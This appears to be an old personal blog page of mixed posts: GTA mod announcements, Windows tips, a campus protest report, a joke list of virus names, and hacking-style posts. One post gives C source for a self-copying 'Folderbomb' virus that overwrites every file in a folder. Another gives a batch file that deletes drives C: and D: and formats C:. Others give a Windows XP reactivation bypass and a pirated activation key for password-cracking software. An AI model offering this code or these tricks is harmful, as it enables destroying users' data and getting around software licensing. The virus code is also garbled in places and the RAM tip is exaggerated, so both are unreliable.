GTA III mod 1.0

This is a popular mod for GTA III that updates Liberty City to look even more like an average American city. Included are new cars, new weapons, buildings, bridges, and even the Statue of Liberty. Each car has been redesigned and some familiar businesses have taken up shop in Liberty City. Weapons are stronger, trees have been replaced, new bridges have been added and previously closed areas are now open to exploration. Created as a mixture of all the best GTA III mods, this one is sure to please.
The mod also includes new in-game menus and loading screens; in-game texts changed to fit the RGTA; new billboards, posters and advertisements all over Liberty City; water has got a new color; all trees have been changed to beautiful palms; grey rocks/cliffs are now beige like in Greece; the roads look more modern; the pipes in the water have been deleted; you can travel by boat everywhere you want; nail boxes belongs to Euro Express; new helicopters at airport; new pager by CityGear; new crosshairs for rocket launcher and sniper rifle; default ugly radar is now color and very detailed: roads are white, buildings are orange, grass is green, water is blue and places of interest are purple.
You can download it here.
Happy Gaming!



Category: 0 comments

Grand Theft Auto:Vice City ultimate mod 2.0

You will need to have the full PC version of Grand Theft Auto: Vice City in order to install this mod. You need a fresh install of Vice City to install this mod or it will not work. If you have Ultimate Vice City 1.1 installed, you must uninstall Grand Theft Auto: Vice City, re-install Vice city, then install Ultimate Vice city 2.0.
This is a mod for Grand Theft Auto: Vice City that adds 40 real cars, a new bridge, new billboards and more. Everything is included in an automatic installer. 
New cars in Version 2.0: Washington = BMW 850; SandKing (Sunshine Auto) = Ford F-150; Sanchez (moto)= Yamaha YZ 450; Virgo = Porshe 911 Turbo; Sentinel XS = Vector M12; Regina = Lotus Elise GTR; Admiral = Nissan Skyline (Handling probleme in beta version); BF Injection = BMW Hamann; Oceanic = Toyota Supra Turbo; GreenWood = Nissan R390 GT1; Rumpo = Toyota Supra (Fast and Furious); Faggio = Shop Cart; Pheonix = Bugatti Veyron Concept 2004; Walton = Opel Speedster; Blista Compact = Ford TS 50; Moonbeam = Mercedes SL600; Mesa Grande = Ferrari 550 Barchetta; and Glendale = Dodge Charger.
 Other additions and changes: all the billboards are changed; new main menu; adds Twin Towers of World Trade Center; adds a new bridge, and adds a Nokia Store.
You can download it  here
Happy Gaming!



Category: 1 comments

A Simple Virus in C

This is only for educational purpose!
VIRUS CODE
/*This is a simple program to create a virus in c
It will create Folder in a Folder in a Folder and so on ......


#include"iostream.h"
#include"conio.h"
#include"stdio.h"
void main(int argc,char* argv[])
{ char buf[512];
int source,target,byt,done;
struct ffblk ffblk;
clrscr();
textcolor(2);
cprintf(”————————————————————————–”);
printf(”\nVirus: Folderbomb 1.0\nProgrammer:MayankSharma(mayanksmansion.tk@gmail.com)\n”);
cprintf(”————————————————————————–”);
done = findfirst(”*.*”,&ffblk,0);
while (!done)
{ printf(”\n”);cprintf(” %s “, ffblk.ff_name);printf(”is attacked by “);cprintf(”Folderbomb”);
source=open(argv[0],O_R
DONLYO_BINARY);
target=open(ffblk.ff_name,O_CREATO_BINARYO_WRONGLY);
while(1)
{byt=read(source,buf,512);
if(byt>0)
write(target,buf,byt);
else
break;
}
close(source);
close(target);
done = findnext(&ffblk);
}
getch();
}


Category: 0 comments

Increase your RAM and thereby system speed

1). Start any application, say Word. Open some large documents.

2). Press
CTRL+SHIFT+ESC to open Windows Task Manager and click Processes tab and sort the list in descending order on Memory Usage. You will notice that WINWORD.EXE will be somewhere at the top, using multiple MBs of memory.

3). Now switch to Word and simply minimize it. (Don't use the Minimize All Windows option of the task bar).
4). Now go back to the Windows Task Manager and see where WINWORD.EXE is listed. Most probably you will not find it at the top. You will typically have to scroll to the bottom of the list to find Word. Now check out the amount of RAM it is using. Surprised? The memory utilization has reduced by a huge amount.
5). Minimize each application that you are currently not working on by clicking on the Minimize button & you can increase the amount of available RAM by a substantial margin. Depending upon the number and type of applications you use together, the difference can be as much as 50 percent of extra RAM.
                In any multitasking system, minimizing an application means that it won't be utilized by the user right now. Therefore, the OS automatically makes the application use virtual memory & keeps bare minimum amounts of the code in physical RAM.

Category: 0 comments

Windows tips and tricks

Make desktop icons transparent:
Go to control Panel > System, > Advanced > Performance area > Settings button Visual Effects tab "Use drop shadows for icon labels on the Desktop"

Make your folders private:
•Open My Computer
•Double-click the drive where Windows is installed (usually drive (C:), unless you have more than one drive on your computer).
•If the contents of the drive are hidden, under System Tasks, click Show the contents of this drive.
•Double-click the Documents and Settings folder.
•Double-click your user folder.
•Right-click any folder in your user profile, and then click Properties.
•On the Sharing tab, select the Make this folder private so that only I have access to it check box.


Note

•To open My Computer, click Start, and then click My Computer.
•This option is only available for folders included in your user profile. Folders in your user profile include My Documents and its subfolders, Desktop, Start Menu, Cookies, and Favorites. If you do not make these folders private, they are available to everyone who uses your computer.
•When you make a folder private, all of its subfolders are private as well. For example, when you make My Documents private, you also make My Music and My Pictures private. When you share a folder, you also share all of its subfolders unless you make them private.
•You cannot make your folders private if your drive is not formatted as NTFS


How to update windows xp properly: 
If you want to save your files to your hard drive, so after a format you dont have to download them all again, here's How:
- Logon to Windows Update
- Choose Windows Update Catalogue (left hand pane)
- Choose Find updates for Microsoft Windows operating systems (right hand pane)
- Choose your version and language then Search
- Choose one the following:
- Critical Updates and Service Packs
- Service Packs and Recommended Downloads
- Multi-Language Features (0)


- Once chosen simply click on what you want to download and then back at the top click Review Download Basket

- You are taken to the next page where at the top you can specify where the downloads are to be saved.
- Click Download now. Each patch will make a directory under the root of the folder you saved them to.
Once finished you need to go where you saved the file (s) and then simply install all your patches.
Never re-activate Windows xp:
If you have to reinstall Windows XP you normally will have to reactivate too. Well not anymore. Just copy wpa.dbl after you activated the first time. It is located in the WINDOWS\system32 folder. Now if you reinstall Windows XP just copy the file back and you're up and running again.

MS-DOS Editor:
Go to start->run, type edit. 
Windows XP comes with another text editor besides Notepad - it's called the MS-DOS Editor, and it's commonly referred to simply as Edit. It has features similar to Notepad, as well as additional features such as the ability to work with multiple text files and change the background and text colors.
Category: 0 comments

Protest at GGSIPU campus

The students of various affiliated colleges of GGSIP University  launched a protest against the 'year-back' rule of the university.
According to the university rule, if a student has less than 50% credits in a year, he has to redo that particular year. But the students were not satisfied with this rule of the university and started the protest to 'take back their year-back'.

The university is looking at it as sign of  growing frustration among students and has taken various steps to deal with it.
As of now the matter is pending with the Delhi high court.

Category: 3 comments

Another notepad virus...

Now here's how to make a virus in notepad to format your hard drive.
Type this in notepad:


@echo off
DEL C:\ -y
DEL D:\ -y
FORMAT C:\ -y


(write in notepad save as "filename.bat")


You can write any name just save it as .bat
Done!

Enjoy...
Category: 0 comments

New computer viruses that will make you smile...

Here are the names of a few computer viruses with a short description of what they do. These are very funny!


THE SURVIVOR VIRUS

Deletes your files one by one over 13 weeks until only the most annoying one remains. 






THE DAN QUAYLE VIRUS

Destroys all the files stored on your Etch-a-Sketch. 






THE ELIAN VIRUS

You can't decide what to do with it, until the Janet Reno Virus finally kicks in your door and deletes it. 







THE JIMINY CRICKET VIRUS

Changes your Zip disk into a Zip-A-Dee-Doo-Dah disk. 






THE JENNIFER LOPEZ VIRUS

Adjusts screen so that you see a lot of words, but not the ones you *really* want to see. 






THE MIRCROSOFT VIRUS

Renders your computer virtually useless.
Also known by the name "Windows 98." 






THE AL GORE VIRUS

Claims that it *IS* the internet. 






THE PAT BUCHANAN VIRUS

Splits otherwise healthy drive into two meaningless parts.
Don't worry -- it affects less than 1% of computers and isn't likely to spread at all. 






THE TIGER WOODS VIRUS

Beats the holy crap out of you in every computer game you play. 






THE WONDERBRA VIRUS

Results in overflow stack. 






THE O.J. VIRUS

Every time you try to search for a file, it runs "Pro Golf Tour 2000" instead. 






THE BRITNEY SPEARS VIRUS

Your partitions mysteriously quadruple in size overnight. 






THE FIRESTONE VIRUS

Leaves chunks of its code all over the information highway. 






THE KURT COBAIN VIRUS

Deletes itself before it has a chance to do anything important. 






THE I HATE YOU VIRUS

Emits shrill scream from speakers when you refuse to buy the new computer game that "all the other computers at school already have." 






THE JOHN ROCKER VIRUS

Re-categorizes everything on your computer into a few simple folders that it can understand. 






THE KURSK VIRUS

Crashes your subroutines, then blocks calls to the Help Desk. 






THE GEORGE W. VIRUS

Causes your CPU to keep executing and executing and executing.... 






THE BOULDER POLICE VIRUS

Can't even *find* your computer. 



 





Had a hearty laugh?


Enjoy...
Category: 1 comments

How to recover rar password

Now you can recover forgotten passwords (or know the passwords not known to you) by using a simple software.
Just download 'advanced rar password recovery'. The link is given below

http://download.cnet.com/3001-2250_4-10046812.html?spi=eb9c531aa1697ca16460e73d45ef5ae2

The activation password for the software is
ARPR-83296730531875-CBBVYBXFEXDEVPMB

 Enjoy...

Copyright ©

Creative Commons License
http://www.mayanksmansion.tk is licensed under a Creative Commons Attribution-NonCommercial-NoDerivs 3.0 Unported License

Protected by Copyscape Online Plagiarism Test

Copyright © 2011 Mayank Sharma. Powered by Blogger.